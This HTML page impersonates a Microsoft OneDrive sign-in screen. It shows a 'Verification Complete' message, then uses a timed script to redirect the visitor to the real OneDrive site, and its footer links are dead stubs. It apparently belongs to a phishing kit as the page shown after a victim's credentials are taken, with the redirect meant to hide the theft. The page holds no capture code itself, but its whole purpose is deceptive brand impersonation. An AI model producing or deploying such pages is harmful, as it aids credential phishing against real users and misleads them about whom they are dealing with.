<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign in - Microsoft OneDrive</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
</head>

<body class="cb" style="margin: 0;padding: 0;">
  <div class="login-paginated-page">
    <div class="background-image-holder">
      <div id="backgroundImage" class="background-image ext-background-image" style="background-image: url('/img/onedrive-bg.png');"></div>
    </div>

    <div class="outer">
      <div class="template-section main-section">
        <div class="middle ext-middle">
          <div class="full-height">
            <div class="flex-column">
              <div class="win-scroll">
                <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">
                  <div class="lightbox-cover"></div>

                  <div style="text-align:center;">
                    <svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="https://www.w3.org/2000/svg">
                      <circle cx="32" cy="32" r="32" fill="#62CF66"></circle>
                      <path fill-rule="evenodd" clip-rule="evenodd" d="M28.2514 44.0347C27.4541 44.9285 26.0553 44.9259 25.2614 44.0291L14.5907 31.9753C14.151 31.4787 14.3078 30.6995 14.9054 30.4116L15.3589 30.1931C15.686 30.0354 16.0729 30.0675 16.3695 30.2769L25.0794 36.423C25.8341 36.9556 26.8554 36.902 27.5502 36.2934L47.6139 18.7212C47.9155 18.4571 48.3457 18.3986 48.7068 18.5726L49.0901 18.7573C49.689 19.0458 49.8448 19.8277 49.4023 20.3238L28.2514 44.0347Z" fill="white"></path>
                    </svg>
                    <h3>Verification Complete</h3>
                    <p>You will be redirected back to our homepage shortly.</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div id="footer" role="contentinfo" class="footer ext-footer">
      <div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links">
        <a id="ftrTerms" href="javascript:void(0)" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
        <a id="ftrPrivacy" href="javascript:void(0)" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
        <a id="moreOptions" href="javascript:void(0)" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
      </div>
    </div>
  </div>

  <script>
    setTimeout(() => {
      window.location.href = 'https://www.microsoft.com/en-us/microsoft-365/onedrive/online-cloud-storage';
    }, 5000)
  </script>
</body>

</html>